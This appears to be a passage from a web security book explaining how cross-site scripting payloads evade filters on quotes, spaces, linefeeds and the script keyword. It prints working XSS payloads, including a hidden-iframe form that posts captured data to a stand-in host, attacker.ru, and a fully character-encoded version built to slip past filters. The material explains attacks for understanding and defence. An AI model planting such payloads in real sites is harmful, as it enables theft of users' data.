Solving Problems
| | ||
| | ||
| | ||
Sometimes, an attacker encounters a situation, in which a particular attacking method is impossible to implement. The most common case is filtration of apostrophes and quotation marks in received and sent data.
If these characters enclose parameters of tags, styles, and so on, it is often possible to rewrite the same expression without spaces.
If a string is needed in JavaScript code, the attacker can use the fromCharCode() function of the string class. This function takes a sequence of integers and returns a string consisting of characters corresponding to these ASCII codes, such as in this example:
<script> alert(String.fromCharCode(72, 101, 108, 108, 111)); </script>
This is how the attacker can avoid using quotation marks in JavaScript code.
Outside JavaScript code, spaces often can be removed from text without affecting the program's functionality. Inside JavaScript code, a space character can be replaced with an empty comment.
If linefeed and carriage return characters are filtered, the attacker can write JavaScript code in one line because a linefeed doesn't carry syntax information. A linefeed character always can be replaced with a space, and a space can be replaced with a /**/ sequence.
Consider an example of complicated JavaScript code that sends data in a form to an iframe object contained in a hidden layer. The JavaScript code shouldn't contain linefeeds, spaces, or quotation marks:
<div style=visibility:hidden;position:absolute;width:0; height:0;><iframe name=if1></iframe></div> <form name=f1 method=POST target=if1 action=http://www.attacker.ru/ attacker.php><input type=hidden name=data></form> <script> test=String.fromCharCode(72,101,108,108,111)); document.f1.data=test; document.f1.submit(); </script>
You should remove all linefeed characters from this code before sending. You also should remove spaces that are present before the JavaScript code, in the form declaration, and in the hidden fields.
You can do without spaces and rewrite this code in one line. It will loose readability but retain its functionality:
<script>test=String.fromCharCode(72,101,108,108,111));document.open(); document.write(String.fromCharCode(60,100,105,118,32,115,116,121,108, 101,61,118,105,115,105,98,105,108,105,116,121,58,104,105,100,100,101, 110,59,112,111,115,105,116,105,111,110,58,97,98,115,111,108,117,116, 101,59,119,105,100,116,104,58,48,59,104,101,105,103,104,116,58,48,59, 62,60,105,102,114,97,109,101,32,110,97,109,101,61,105,102,49,62,60,47, 105,102,114,97,109,101,62,60,47,100,105,118,62));document.write(Strin g.fromCharCode(60,102,111,114,109,32,110,97,109,101,61,102,49,32,109, 101,116,104,111,100,61,80,79,83,84,32,116,97,114,103,101,116,61,105, 102,49,32,97,99,116,105,111,110,61,104,116,116,112,58,47,47,119,119, 119,46,97,116,97,99,107,101,114,46,114,117,47,97,116,97,99,107,101, 114,46,112,104,112,62,60,105,110,112,117,116,32,116,121,112,101,61, 104,105,100,100,101,110,32,110,97,109,101,61,100,97,116,97,32,118,97, 108,117,101,61,39)+test+String.fromCharCode(39,62,60,47,102,111,114, 109,62));document.close();document.f1.submit();</script>
This is the code that sends data in a form to an iframe object contained in a hidden layer. It isn't readable, but it works correctly. It allows the attacker to circumvent filtration of linefeeds, quotation marks, and spaces.
This example proves that it is possible to create a script that exploits the XSS vulnerability and passes many checks.
In addition, the attacker is likely to check for the most common filtration mistakes. For example, if a message is filtered by removing the <script> keyword from it, the attacker can try to write it using uppercase letters to confuse the filtration algorithms. For another example, if the <script> keyword is deleted once, the attacker can use a construction such as <scri<script>pt>. After the <script> keyword is deleted, the correct tag will remain in the message.
In other words, there can be various solutions depending on which filtration algorithms are used.
| | ||
| | ||
| | ||
